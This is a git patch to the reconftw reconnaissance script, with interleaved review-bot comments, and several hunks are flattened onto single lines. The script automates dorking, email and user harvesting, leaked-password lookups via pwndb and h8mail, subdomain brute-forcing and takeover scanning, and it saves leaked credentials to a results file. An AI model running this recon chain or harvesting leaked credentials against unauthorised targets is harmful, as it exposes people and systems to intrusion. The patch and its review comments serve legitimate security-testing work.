From 2fc578479a92ff5b5c890ea4469ebfedfbb55486 Mon Sep 17 00:00:00 2001
From: six2dez
Date: Fri, 12 Mar 2021 01:01:55 +0100
Subject: [PATCH 1/3] Code rewriting start/end func, wget blc, multidomain target allowed and spinner

---
 reconftw.cfg | 9 +-
 reconftw.sh | 777 ++++++++++++++++++++++++---------------------------
 2 files changed, 365 insertions(+), 421 deletions(-)

diff --git a/reconftw.cfg b/reconftw.cfg
index b091d01c..2ac2ff4c 100644
--- a/reconftw.cfg
+++ b/reconftw.cfg
@@ -27,10 +27,10 @@ GITHUB_TOKENS=${tools}/.github_tokens
 #SHODAN_API_KEY=XXXXXXXXXXXXX
 #XSS_SERVER=XXXXXXXXXXXXXXXXX
 #COLLAB_SERVER=XXXXXXXXXXXXXXXXX
-findomain_virustotal_token=XXXXXXXXXXXXXXXXX
-findomain_spyse_token=XXXXXXXXXXXXXXXXX
-findomain_securitytrails_token=XXXXXXXXXXXXXXXXX
-findomain_fb_token=XXXXXXXXXXXXXXXXX
+#findomain_virustotal_token=XXXXXXXXXXXXXXXXX
+#findomain_spyse_token=XXXXXXXXXXXXXXXXX
+#findomain_securitytrails_token=XXXXXXXXXXXXXXXXX
+#findomain_fb_token=XXXXXXXXXXXXXXXXX
 
 # File descriptors
 DEBUG_STD="&>/dev/null"
@@ -64,6 +64,7 @@ PORTSCAN_ACTIVE=true
 # Web analysis
 WAF_DETECTION=true
 NUCLEICHECK=true
+URL_CHECK=true
 URL_GF=true
 JSCHECKS=true
 PARAMS=true
diff --git a/reconftw.sh b/reconftw.sh
index 229cc61d..6edc7d58 100755
--- a/reconftw.sh
+++ b/reconftw.sh
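Review bot: reconftw.cfg is where API credentials live (the four `findomain_*_token` lines commented out here sit next to `GITHUB_TOKENS`), yet nothing in the file says it holds secrets; add a comment at the top of that section, e.g. `# This section holds API tokens: keep the file mode 600 and out of version control once filled in`. The new `URL_CHECK=true` switch has no consumer in any reconftw.sh hunk visible in this patch; if it is read in a part of the diff not shown that is fine, otherwise it is a dead option until the corresponding function is gated on it. The rest of reconftw.cfg is outside this hunk.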
@@ -96,27 +96,23 @@ function tools_installed(){
 function google_dorks(){
 if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] && [ "$GOOGLE_DORKS" = true ]
 then
- start=`date +%s`
- printf "${bgreen}#######################################################################\n"
- printf "${bblue} Performing Google Dorks ${reset}\n\n"
+ start_func "Google Dorks in process"
 $tools/degoogle_hunter/degoogle_hunter.sh $domain | tee osint/dorks.txt
 sed -r -i "s/\x1B\[([0-9]{1,3}(;[0-9]{1,2})?)?[mGK]//g" osint/dorks.txt && touch $called_fn_dir/.${FUNCNAME[0]}
- end=`date +%s`
- getElapsedTime $start $end
- text="$\n${bblue} Google Dorks finished in ${runtime} Happy hunting! ${reset}\n"
- printf "${text}" && printf "${text}" | $NOTIFY
- printf "${bgreen}#######################################################################\n"
+ end_func "Results are saved in osint/dorks.txt" ${FUNCNAME[0]}
 else
- printf "${yellow} ${FUNCNAME[0]} are already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
+ if [ "$GOOGLE_DORKS" = false ]; then
+ printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
+ else
+ printf "${yellow} ${FUNCNAME[0]} are already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n"
+ fi
 fi
 }
 
 function github_dorks(){
 if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$GITHUB_DORKS" = true ]
 then
- printf "${bgreen}#######################################################################\n"
- printf "${bblue} GitHub Dorks Scanning ${reset}\n\n"
- start=`date +%s`
+ start_func "Github Dorks in process"
 if [ -s "${GITHUB_TOKENS}" ]
 then
 if [ "$DEEP" = true ] ; then
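Review bot: In google_dorks the conditional `sed ... && touch $called_fn_dir/.${FUNCNAME[0]}` is kept while the next line adds `end_func "Results are saved in osint/dorks.txt" ${FUNCNAME[0]}`; if end_func writes the done-marker from its second argument (which is what every other hunk in this patch relies on), the marker is now created even when degoogle_hunter or sed fails and the inline `&& touch` is dead. Either drop the inline touch here for consistency with the other functions, or keep the touch conditional and omit `${FUNCNAME[0]}` from this end_func call. `$domain` is also passed unquoted to degoogle_hunter.sh; quote it as `"$domain"`, especially now that the commit title says targets can come from a list. start_func and end_func are defined outside this hunk.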
@@ -128,15 +124,9 @@ function github_dorks(){ else printf "\n${bred} Required file ${GITHUB_TOKENS} not exists or empty${reset}\n" fi - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n GitHub Dorks Finished in ${runtime}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in osint/gitdorks.txt${reset}\n" - printf "${bgreen}#######################################################################\n\n" + end_func "Results are saved in osint/gitdorks.txt" ${FUNCNAME[0]} else - if [ "$DORKS" = false ]; then + if [ "$GITHUB_DORKS" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" @@ -147,19 +137,12 @@ function github_dorks(){ function metadata(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$METADATA" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} Metadata scan ${reset}\n" - start=`date +%s` + start_func "Scanning metadata in public files" eval metafinder -d $domain -l 20 -o osint -go -bi -ba $DEBUG_STD eval mv osint/${domain}/* osint/ $DEBUG_ERROR eval rmdir osint/${domain} $DEBUG_ERROR touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n Metadata scan finished in ${runtime}${reset}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in osint folder ${reset}\n" - printf "${bgreen}#######################################################################\n" + end_func "Results are saved in osint/[software/authors/metadata_results].txt" ${FUNCNAME[0]} else if [ "$METADATA" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" 
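Review bot: `eval metafinder -d $domain -l 20 -o osint -go -bi -ba $DEBUG_STD` re-parses the target through the shell, so a target containing metacharacters (`;`, `$(...)`, backticks) is executed rather than scanned; with this commit allowing multi-domain targets supplied from outside the script, each entry should be validated before it reaches any `eval`, e.g. `[[ "$domain" =~ ^[A-Za-z0-9.-]+$ ]] || { printf "${bred} invalid target ${domain}${reset}\n"; exit 1; }` at argument parsing. The same `eval ... $domain ... $DEBUG_STD` pattern repeats in most functions of this file, so one check at the entry point is the cheapest fix. `mv osint/${domain}/* osint/` and `rmdir osint/${domain}` are likewise unquoted. Argument parsing is outside this hunk.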
@@ -172,15 +155,13 @@ function metadata(){ function emails(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$EMAILS" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} Emails search ${reset}\n" - start=`date +%s` + start_func "Searching emails/users/passwords leaks" cd $tools/theHarvester eval python3 theHarvester.py -d $domain -b all $DEBUG_ERROR > $dir/.tmp/harvester.txt cd $dir - cat .tmp/harvester.txt | awk '/Emails/,/Hosts/' | sed -e '1,2d' | head -n -2 | anew -q osint/emails.txt - cat .tmp/harvester.txt | awk '/Users/,/IPs/' | sed -e '1,2d' | head -n -2 | anew -q osint/users.txt - cat .tmp/harvester.txt | awk '/Links/,/Users/' | sed -e '1,2d' | head -n -2 | anew -q osint/linkedin.txt + cat .tmp/harvester.txt | awk '/Emails/,/Hosts/' | sed -e '1,2d' | head -n -2 | sed -e '/Searching /d' -e '/exception has occurred/d' -e '/found:/Q' | anew -q osint/emails.txt + cat .tmp/harvester.txt | awk '/Users/,/IPs/' | sed -e '1,2d' | head -n -2 | sed -e '/Searching /d' -e '/exception has occurred/d' -e '/found:/Q' | anew -q osint/users.txt + cat .tmp/harvester.txt | awk '/Links/,/Users/' | sed -e '1,2d' | head -n -2 | sed -e '/Searching /d' -e '/exception has occurred/d' -e '/found:/Q' | anew -q osint/linkedin.txt eval h8mail -t $domain -q domain --loose -c $tools/h8mail_config.ini -j .tmp/h8_results.json $DEBUG_STD if [ -s ".tmp/h8_results.json" ] 
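Review bot: `cd $tools/theHarvester` has no failure check, so if `$tools` is unset or the directory is missing, `python3 theHarvester.py` runs in the current directory, its error is swallowed by `$DEBUG_ERROR`, and the three new `awk | sed` pipelines silently produce empty emails/users/linkedin files; use `cd "$tools/theHarvester" || return 1` and likewise `cd "$dir"`. The new filters also depend on GNU extensions (`sed '/found:/Q'`, `head -n -2`), which is acceptable for the Linux hosts reconftw assumes but deserves a comment such as `# GNU sed/head only: Q stops at the first "found:" summary line`. The function continues past the hunk.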
@@ -193,19 +174,13 @@ function emails(){ if [ "$PWNDB_STATUS" = 200 ] then cd $tools/pwndb - python3 pwndb.py --target "@${domain}" | anew -q $dir/osint/pwndb.txt + python3 pwndb.py --target "@${domain}" | anew -q $dir/osint/passwords.txt cd $dir else text="${yellow}\n pwndb is currently down :(\n\n Check xjypo5vzgmo7jca6b322dnqbsdnp3amd24ybx26x5nxbusccjkm4pwid.onion${reset}\n" printf "${text}" && printf "${text}" | $NOTIFY fi - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n Emails Search Finished in ${runtime}${reset}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in osint folder ${reset}\n" - printf "${bgreen}#######################################################################\n" + end_func "Results are saved in osint/[emails/users/h8mail/passwords].txt" ${FUNCNAME[0]} else if [ "$EMAILS" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -219,10 +194,7 @@ function emails(){ function domain_info(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$DOMAIN_INFO" = true ] then - printf "${bgreen}#######################################################################\n" - printf "${bblue} Domain info search ${reset}\n" - start=`date +%s` - + start_func "Searching domain info (whois, registrant name/email domains)" lynx -dump https://domainbigdata.com/${domain} | tail -n +19 > osint/domain_info_general.txt cat osint/domain_info_general.txt | grep '/nj/' | tr -s ' ' ',' | cut -d ',' -f3 > .tmp/domain_registrant_name.txt 
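Review bot: The pwndb output is now written to `osint/passwords.txt`, i.e. leaked credentials are stored in plaintext in the results tree with default permissions; tighten it right after the `anew -q` line, e.g. `chmod 600 $dir/osint/passwords.txt` (or set `umask 077` at start-up), and mention in the end_func message that the folder holds sensitive data. Additionally, `lynx -dump https://domainbigdata.com/${domain}` builds the URL from an unquoted, unvalidated `$domain`; quote it. domain_info continues outside the hunk.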
@@ -251,13 +223,7 @@ function domain_info(){ lynx -dump $line | tail -n +18 | sed -n '/]domainbigdata.com/q;p' >> osint/domain_info_ip.txt && echo -e "\n\n#######################################################################\n\n" >> osint/domain_info_ip.txt done fi - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - text="${bblue}\n Domain Info Search Finished in ${runtime}${reset}\n" - printf "${text}" && printf "${text}" | $NOTIFY - printf "${bblue} Results are saved in osint folder ${reset}\n" - printf "${bgreen}#######################################################################\n" + end_func "Results are saved in osint/domain_info_[general/name/email/ip].txt" ${FUNCNAME[0]} else if [ "$DOMAIN_INFO" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" @@ -303,14 +269,11 @@ function subdomains_full(){ NUMOFLINES_probed=$(eval cat webs/webs.txt $DEBUG_ERROR | anew .tmp/probed_old.txt | wc -l) fi printf "${bblue}\n Total subdomains: ${reset}\n\n" - text="${bred}\n - ${NUMOFLINES_subs} new alive subdomains${reset}\n\n" - printf "${text}" && printf "${text}" | $NOTIFY + notification "- ${NUMOFLINES_subs} new alive subdomains" good eval cat subdomains/subdomains.txt $DEBUG_ERROR | sort - text="${bred}\n - ${NUMOFLINES_probed} new web probed${reset}\n\n" - printf "${text}" && printf "${text}" | $NOTIFY + notification "- ${NUMOFLINES_probed} new web probed" good eval cat webs/webs.txt $DEBUG_ERROR | sort - text="${bblue}\n Subdomain Enumeration Finished\n" - printf "${text}" && printf "${text}" | $NOTIFY + notification "Subdomain Enumeration Finished" good printf "${bblue} Results are saved in subdomains/subdomains.txt and webs/webs.txt${reset}\n" printf "${bgreen}#######################################################################\n\n" } 
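Review bot: The new `notification "- ${NUMOFLINES_subs} new alive subdomains" good` and `"- ${NUMOFLINES_probed} new web probed" good` messages begin with `- `, which notifier CLIs and `echo` commonly parse as an option if notification() passes its first argument on a command line; notification's body is outside this hunk so I cannot confirm, but dropping the leading dash (`"${NUMOFLINES_subs} new alive subdomains"`) removes the question. Style: subdomains_full is now the only function left printing its own `#####` footer and "Results are saved" line instead of going through end_func.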
@@ -318,8 +281,9 @@ function subdomains_full(){ function sub_passive(){ if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ] then - start=`date +%s` - printf "${yellow} Running : Passive Subdomain Enumeration${reset}\n" + start_subfunc "Running : Passive Subdomain Enumeration" + #start=`date +%s` + #printf "${yellow} Running : Passive Subdomain Enumeration${reset}\n\n" eval subfinder -d $domain -o .tmp/subfinder.txt $DEBUG_STD eval assetfinder --subs-only $domain $DEBUG_ERROR | anew -q .tmp/assetfinder.txt eval amass enum -passive -d $domain -config $AMASS_CONFIG -o .tmp/amass.txt $DEBUG_STD @@ -327,13 +291,11 @@ function sub_passive(){ eval crobat -s $domain $DEBUG_ERROR | anew -q .tmp/crobat.txt timeout 5m waybackurls $domain | unfurl --unique domains | anew -q .tmp/waybackurls.txt NUMOFLINES=$(eval cat .tmp/subfinder.txt .tmp/assetfinder.txt .tmp/amass.txt .tmp/findomain.txt .tmp/crobat.txt .tmp/waybackurls.txt $DEBUG_ERROR | sed "s/*.//" | anew .tmp/passive_subs.txt | wc -l) - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - if [ "$NUMOFLINES" -gt 0 ]; then - text="${green} ${NUMOFLINES} new subdomains by passive found in ${runtime}${reset}\n\n" - printf "${text}" && printf "${text}" | $NOTIFY - fi + end_subfunc "${NUMOFLINES} new subs (passive)" ${FUNCNAME[0]} + #touch $called_fn_dir/.${FUNCNAME[0]} + #end=`date +%s` + #getElapsedTime $start $end + #notification "${NUMOFLINES} new subdomains found with passive techniques in ${runtime}" good else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi 
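Review bot: The old implementation is left behind as commented-out lines (`#start=`, `#printf ...`, `#touch ...`, `#end=`, `#getElapsedTime`, `#notification ...`) in this hunk and in every sub_* hunk that follows; delete them, git history keeps the old code and the dead lines make the new start_subfunc/end_subfunc flow harder to read. The `subfinder`, `assetfinder`, `amass`, `crobat` and `timeout 5m waybackurls $domain` calls all pass `$domain` unquoted, which matters once targets are read from a list. sub_passive's skip branch is outside the hunk.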
@@ -342,8 +304,9 @@ function sub_passive(){ function sub_crt(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBCRT" = true ] then - start=`date +%s` - printf "${yellow} Running : Crtsh Subdomain Enumeration${reset}\n" + start_subfunc "Running : Crtsh Subdomain Enumeration" + #start=`date +%s` + #printf "${yellow} Running : Crtsh Subdomain Enumeration${reset}\n\n" cd $tools/crtfinder eval python3 crtfinder.py -u $domain $DEBUG_STD outputfile=${domain%%.*} @@ -372,12 +335,10 @@ function sub_crt(){ fi touch $called_fn_dir/.${FUNCNAME[0]} NUMOFLINES=$(eval cat .tmp/crtsh_subs_tmp.txt $DEBUG_ERROR | anew .tmp/crtsh_subs.txt | wc -l) - end=`date +%s` - getElapsedTime $start $end - if [ "$NUMOFLINES" -gt 0 ]; then - text="${green} ${NUMOFLINES} new subdomains by certificate transparency found in ${runtime}${reset}\n\n" - printf "${text}" && printf "${text}" | $NOTIFY - fi + end_subfunc "${NUMOFLINES} new subs (cert transparency)" ${FUNCNAME[0]} + #end=`date +%s` + #getElapsedTime $start $end + #notification "${NUMOFLINES} new subdomains by certificate transparency found in ${runtime}" good else if [ "$SUBCRT" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" 
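Review bot: sub_crt keeps the context line `touch $called_fn_dir/.${FUNCNAME[0]}` right before the NUMOFLINES computation and now also passes `${FUNCNAME[0]}` to `end_subfunc`, whereas the other sub_* hunks removed the inline touch; remove it here too or the marker is written twice. `cd $tools/crtfinder` is unchecked, and `outputfile=${domain%%.*}` keeps only the first label of the domain, so two targets sharing it (`foo.com`, `foo.net`) would collide on the same output file. The function ends outside the hunk.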
@@ -390,17 +351,16 @@ function sub_crt(){ function sub_brute(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBBRUTE" = true ] then - start=`date +%s` - printf "${yellow} Running : Bruteforce Subdomain Enumeration${reset}\n" + start_subfunc "Running : Bruteforce Subdomain Enumeration" + #start=`date +%s` + #printf "${yellow} Running : Bruteforce Subdomain Enumeration${reset}\n\n" eval shuffledns -d $domain -w $subs_wordlist -r $resolvers -t 5000 -o .tmp/active_tmp.txt $DEBUG_STD NUMOFLINES=$(eval cat .tmp/active_tmp.txt $DEBUG_ERROR | sed "s/*.//" | anew .tmp/brute_subs.txt | wc -l) - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - if [ "$NUMOFLINES" -gt 0 ]; then - text="${green} ${NUMOFLINES} new subdomains by bruteforce found in ${runtime}${reset}\n\n" - printf "${text}" && printf "${text}" | $NOTIFY - fi + end_subfunc "${NUMOFLINES} new subs (bruteforce)" ${FUNCNAME[0]} + #touch $called_fn_dir/.${FUNCNAME[0]} + #end=`date +%s` + #getElapsedTime $start $end + #notification "${NUMOFLINES} new subdomains by bruteforce found in ${runtime}" good else if [ "$SUBBRUTE" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" 
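Review bot: The removed `if [ "$NUMOFLINES" -gt 0 ]` guard is not carried into the new `end_subfunc "${NUMOFLINES} new subs (bruteforce)" ${FUNCNAME[0]}` call, so if end_subfunc forwards its message through $NOTIFY as the old code did, every run now pushes a "0 new subs" notification per sub-step; either guard the call or have end_subfunc skip zero counts. The same guard was dropped in sub_passive, sub_crt, sub_dns, sub_scraping, sub_permut and webprobe_simple in this patch. `$subs_wordlist` and `$resolvers` are passed unquoted through `eval`, so a path with spaces breaks the shuffledns command line.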
@@ -413,22 +373,21 @@ function sub_brute(){ function sub_dns(){ if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ] then - start=`date +%s` - printf "${yellow} Running : Active Subdomain Enumeration${reset}\n" + start_subfunc "Running : Active Subdomain Enumeration" + #start=`date +%s` + #printf "${yellow} Running : Active Subdomain Enumeration${reset}\n\n" cat .tmp/*_subs.txt | anew -q .tmp/subs_no_resolved.txt deleteOutScoped $outOfScope_file .tmp/subs_no_resolved.txt eval shuffledns -d $domain -list .tmp/subs_no_resolved.txt -r $resolvers -t 5000 -o .tmp/subdomains_tmp.txt $DEBUG_STD echo $domain | dnsx -silent | anew -q .tmp/subdomains_tmp.txt dnsx -retry 3 -silent -cname -resp-only -l .tmp/subdomains_tmp.txt | grep ".$domain$" | anew -q .tmp/subdomains_tmp.txt eval dnsx -retry 3 -silent -cname -resp -l subdomains/subdomains.txt -o subdomains/subdomains_cname.txt $DEBUG_STD - NUMOFLINES=$(cat .tmp/subdomains_tmp.txt | anew subdomains/subdomains.txt | wc -l) - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - if [ "$NUMOFLINES" -gt 0 ]; then - text="${green} ${NUMOFLINES} new subdomains by dns resolution found in ${runtime}${reset}\n\n" - printf "${text}" && printf "${text}" | $NOTIFY - fi + NUMOFLINES=$(eval cat .tmp/subdomains_tmp.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l) + end_subfunc "${NUMOFLINES} new subs (dns resolution)" ${FUNCNAME[0]} + #touch $called_fn_dir/.${FUNCNAME[0]} + #end=`date +%s` + #getElapsedTime $start $end + #notification "${NUMOFLINES} new subdomains by dns resolution found in ${runtime}" good else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi 
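Review bot: `dnsx -retry 3 -silent -cname -resp -l subdomains/subdomains.txt -o subdomains/subdomains_cname.txt` runs on the previous contents of subdomains.txt, while the new `NUMOFLINES=$(eval cat .tmp/subdomains_tmp.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l)` line merges this run's resolved hosts only afterwards, so subdomains_cname.txt never contains CNAMEs for hosts discovered in the current run. Move the merge above the cname lookup, or run that dnsx on `.tmp/subdomains_tmp.txt`. The same ordering also means `deleteOutScoped` is applied before resolution but the CNAME-derived hosts added on the line above are never scope-filtered.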
@@ -437,20 +396,19 @@ function sub_dns(){ function sub_scraping(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBSCRAPING" = true ] then - start=`date +%s` - printf "${yellow} Running : Source code scraping subdomain search${reset}\n\n" + start_subfunc "Running : Source code scraping subdomain search" + #start=`date +%s` + #printf "${yellow} Running : Source code scraping subdomain search${reset}\n\n" touch .tmp/scrap_subs.txt cat subdomains/subdomains.txt | httpx -follow-host-redirects -H "${HEADER}" -status-code -timeout 15 -silent -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp.txt gospider -S .tmp/probed_tmp.txt --js -t 50 -H "${HEADER}" --sitemap --robots -w -r | egrep -o 'https?://[^ ]+' | sed 's/]$//' | unfurl --unique domains | grep ".$domain$" | anew -q .tmp/scrap_subs.txt cat .tmp/scrap_subs.txt | eval shuffledns -d $domain -r $resolvers -t 5000 -o .tmp/scrap_subs_resolved.txt $DEBUG_STD NUMOFLINES=$(eval cat .tmp/scrap_subs_resolved.txt $DEBUG_ERROR | anew subdomains/subdomains.txt | wc -l) - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - if [ "$NUMOFLINES" -gt 0 ]; then - text="${green} ${NUMOFLINES} new subdomains by scraping found in ${runtime}${reset}\n\n" - printf "${text}" && printf "${text}" | $NOTIFY - fi + end_subfunc "${NUMOFLINES} new subs (code scraping)" ${FUNCNAME[0]} + #touch $called_fn_dir/.${FUNCNAME[0]} + #end=`date +%s` + #getElapsedTime $start $end + #notification "${NUMOFLINES} new subdomains by scraping found in ${runtime}" good else if [ "$SUBSCRAPING" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" 
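Review bot: Scraped hosts are merged straight into subdomains.txt by the `NUMOFLINES=$(... | anew subdomains/subdomains.txt | wc -l)` line without passing through `deleteOutScoped $outOfScope_file`, unlike sub_dns and webprobe_simple, so out-of-scope hosts linked from in-scope pages end up in every later active step (nuclei, fuzz, portscan). Add `deleteOutScoped $outOfScope_file .tmp/scrap_subs_resolved.txt` before the merge. The function ends outside the hunk.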
@@ -463,8 +421,9 @@ function sub_scraping(){ function sub_permut(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBPERMUTE" = true ] then - start=`date +%s` - printf "${yellow} Running : Permutations Subdomain Enumeration${reset}\n" + start_subfunc "Running : Permutations Subdomain Enumeration" + #start=`date +%s` + #printf "${yellow} Running : Permutations Subdomain Enumeration${reset}\n\n" if [[ $(cat .tmp/subs_no_resolved.txt | wc -l) -le 50 ]] then eval dnsgen .tmp/subs_no_resolved.txt --wordlist $tools/permutations_list.txt $DEBUG_ERROR | eval shuffledns -d $domain -r $resolvers -t 5000 -o .tmp/permute1_tmp.txt $DEBUG_STD @@ -499,13 +458,11 @@ function sub_permut(){ else NUMOFLINES=0 fi - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - if [ "$NUMOFLINES" -gt 0 ]; then - text="${green} ${NUMOFLINES} new subdomains by permutations found in ${runtime}${reset}\n\n" - printf "${text}" && printf "${text}" | $NOTIFY - fi + end_subfunc "${NUMOFLINES} new subs (permutations)" ${FUNCNAME[0]} + #touch $called_fn_dir/.${FUNCNAME[0]} + #end=`date +%s` + #getElapsedTime $start $end + #notification "${NUMOFLINES} new subdomains by permutations found in ${runtime}" good else if [ "$SUBPERMUTE" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" 
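Review bot: The permutation step is gated on a hard-coded `-le 50` line count of `.tmp/subs_no_resolved.txt` with no comment on why that threshold exists, and the `else NUMOFLINES=0` branch in the second hunk suggests larger targets are skipped entirely (the branch body is outside the hunk, so I cannot confirm). Lift the number into reconftw.cfg like the other switches and document it, e.g. `# permutations are only generated when the unresolved list has at most this many entries; larger lists are skipped to bound runtime`.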
@@ -518,23 +475,14 @@ function sub_permut(){
 function subtakeover(){
 if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SUBTAKEOVER" = true ]
 then
- printf "${bgreen}#######################################################################\n"
- printf "${bblue} Subdomain Takeover ${reset}\n\n"
- start=`date +%s`
+ start_func "Looking for possible subdomain takeover"
 touch .tmp/tko.txt
 cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/takeovers/ -o .tmp/tko.txt
 NUMOFLINES=$(eval cat .tmp/tko.txt $DEBUG_ERROR | anew webs/takeover.txt | wc -l)
- touch $called_fn_dir/.${FUNCNAME[0]}
- end=`date +%s`
- getElapsedTime $start $end
 if [ "$NUMOFLINES" -gt 0 ]; then
- text="${bred}\n ${NUMOFLINES} new possible takeovers found in ${runtime}${reset}\n\n"
- printf "${text}" && printf "${text}" | $NOTIFY
+ notification "${NUMOFLINES} new possible takeovers found in ${runtime}" good
 fi
- text="${bblue}\n Subdomain Takeover Finished\n"
- printf "${text}" && printf "${text}" | $NOTIFY
- printf "${bblue} Results are saved in webs/takeover.txt${reset}\n"
- printf "${bgreen}#######################################################################\n\n"
+ end_func "Results are saved in webs/takeover.txt" ${FUNCNAME[0]}
 else
 if [ "$SUBTAKEOVER" = false ]; then
 printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n"
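Review bot: The new `notification "${NUMOFLINES} new possible takeovers found in ${runtime}" good` still interpolates `${runtime}`, but the lines that computed it (`end=`date +%s`` and `getElapsedTime $start $end`) are removed in this same hunk, so the message reports whatever runtime the previous function left behind, or nothing. Drop the suffix: `notification "${NUMOFLINES} new possible takeovers found" good`. A takeover candidate is also not a `good` event; if notification() has a warning level, use it so the alert stands out in the feed.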
@@ -551,18 +499,15 @@ function subtakeover(){ function webprobe_simple(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WEBPROBESIMPLE" = true ] then - start=`date +%s` - printf "${yellow} Running : Http probing${reset}\n\n" + start_subfunc "Running : Http probing" cat subdomains/subdomains.txt | httpx -follow-host-redirects -H "${HEADER}" -status-code -timeout 15 -silent -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp.txt deleteOutScoped $outOfScope_file .tmp/probed_tmp.txt NUMOFLINES=$(eval cat .tmp/probed_tmp.txt $DEBUG_ERROR | anew webs/webs.txt | wc -l) - touch $called_fn_dir/.${FUNCNAME[0]} - end=`date +%s` - getElapsedTime $start $end - if [ "$NUMOFLINES" -gt 0 ]; then - text="${green} ${NUMOFLINES} new websites resolved in ${runtime}${reset}\n\n" - printf "${text}" && printf "${text}" | $NOTIFY - fi + end_subfunc "${NUMOFLINES} new websites resolved" ${FUNCNAME[0]} + #touch $called_fn_dir/.${FUNCNAME[0]} + #end=`date +%s` + #getElapsedTime $start $end + #notification "${NUMOFLINES} new websites resolved in ${runtime}" good else if [ "$WEBPROBESIMPLE" = false ]; then printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" 
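Review bot: `grep ".$domain$"` on the httpx output is an unescaped regex: the leading `.` matches any character and the dots inside `$domain` are wildcards, so `notexample.com` passes the filter for target `example.com` and lands in webs.txt, which the new end_subfunc count reports and which every later active scan consumes; use `grep "\.${domain//./\\.}$"` (`deleteOutScoped` only helps when the operator happened to list that host). The line is context here, but the commit does not address it and the same pattern recurs in sub_dns and sub_scraping.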
